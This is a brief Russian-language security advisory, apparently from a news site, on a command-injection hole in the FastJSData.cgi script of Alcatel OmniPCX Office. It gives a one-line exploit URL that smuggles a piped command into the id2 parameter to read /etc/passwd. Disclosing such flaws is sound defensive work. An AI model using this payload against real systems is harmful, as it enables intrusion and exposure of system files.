Программа: Alcatel OmniPCX Office 210/061.1

Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных сценарием FastJSData.cgi. Удаленный пользователь может выполнить
произвольные команды на целевой системе.

Эксплоит:

http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd



Оставить мнение